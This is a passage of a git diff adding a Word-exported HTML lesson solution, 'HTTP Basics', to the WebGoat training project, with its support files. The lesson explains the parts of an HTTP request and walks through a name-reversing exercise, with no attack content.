+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> Http
+Basics <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+presents the basics for understanding the transfer of data between the browser
+and the web application.<br>
+<br>
+Client Request: <span style='mso-bidi-font-weight:bold'>How HTTP works:</span> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>All HTTP transactions
+follow the same general format. Each client request and server response has
+three parts: the request or response line, a header section, and the entity
+body. The client initiates a transaction as follows: <br>
+<br>
+The client contacts the server and sends a document request <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><br>
+&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; GET /index.html?param=value HTTP/1.0<br>
+<br>
+Next, the client sends optional header information to inform the server of its
+configuration and the document formats it will accept.<br>
+<br>
+&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; User-Agent: Mozilla/4.06 Accept: image/gif,
+image/jpeg, */* <br>
+<br>
+After sending the request and headers, the client may send additional data.
+This data is mostly used by CGI programs using the POST method.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter your
+name in the input field below and press &quot;go&quot; to submit. The server
+will accept the request, reverse the input, and display it back to the user,
+illustrating the basics of handling an HTTP request. <br>
+<br>
+The user should become familiar with the features of WebGoat by manipulating
+the above buttons to view hints, show the HTTP request parameters, the HTTP
+request cookies, and the Java source code.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click “Show
+Params” and ‘Show Cookies”.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-size:8.0pt;
+font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
+ id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
+ path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1" o:spid="_x0000_i1026" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpBasics_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/HttpBasics_files/image005.jpg" v:shapes="Picture_x0020_1"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Enter your name<span
+style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fill out your
+name and click the button Go!<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif";
+mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_2" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpBasics_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/HttpBasics_files/image006.jpg" v:shapes="Picture_x0020_2"><![endif]></span><span
+style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/HttpBasics_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpBasics_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/filelist.xml b/main/project/WebContent/lesson_solutions/HttpBasics_files/filelist.xml
new file mode 100644
index 000000000..2d81880c2
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpBasics_files/filelist.xml
@@ -0,0 +1,10 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../HttpBasics.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image005.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/image001.png b/main/project/WebContent/lesson_solutions/HttpBasics_files/image001.png
new file mode 100644
